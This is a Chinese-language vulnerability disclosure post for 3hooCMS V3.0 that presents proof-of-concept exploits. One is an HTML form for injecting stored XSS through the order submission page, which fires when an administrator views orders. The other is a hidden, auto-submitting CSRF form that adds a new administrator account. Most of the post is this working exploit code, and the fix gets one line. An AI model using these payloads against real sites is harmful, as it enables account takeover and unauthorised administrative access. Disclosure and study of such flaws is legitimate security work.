3hooCMS V3.0 XSS+CSRF&EXP

发布作者:B0mbErM@n

影响版本:3hooCMS V3.0
官方网站:http://www.3hoo.net/

漏洞类型:跨站XSS
漏洞描述:XSS:未对提交内容进行过滤,后台查看订单时将执行XSS语句
CSRF:未对URL来源进行验证,当管理存在cookie时可执行设定的语句

###################### XSS ######################
<style>
.s1{font-size:0px; color:#FFFFFF; border:0px}
</style>
<form method="POST" action="http://localhost/SendOrder.Asp">
<input type=''text'' name=''Title'' size=''32'' value=''在这插XSS语句''>
<input type=''text'' name=''Quantity'' size=''16'' value=''1'' class="s1">
<option value="个"> </option>
<input type="submit" value="提交" name="B1" >
</form>
###################### CSRF #####################(添加管理员)

<style>
.s1{font-size:0px; color:#FFFFFF; border:0px}
</style>
<form method="POST" action="http://localhost/manage/Admin_Send.Asp?rsend=SendAdmin" name="FrmMain">
<input type="text" name="Username" size="20" value="帐号" class="s1">
<input type="text" name="Password" size="20" value="密码" class="s1">
<input type="submit" name="B1" value="B0mbErM@n" class="s1"> </form>
<script>
document.FrmMain.submit();
</script>


修复方案:加强验证与过滤

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:https://www.yesck.com/post/427/

本文 暂无 评论

回复给

欢迎点评

联系我们

站长QQ:8117829

站长邮件:8117829@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code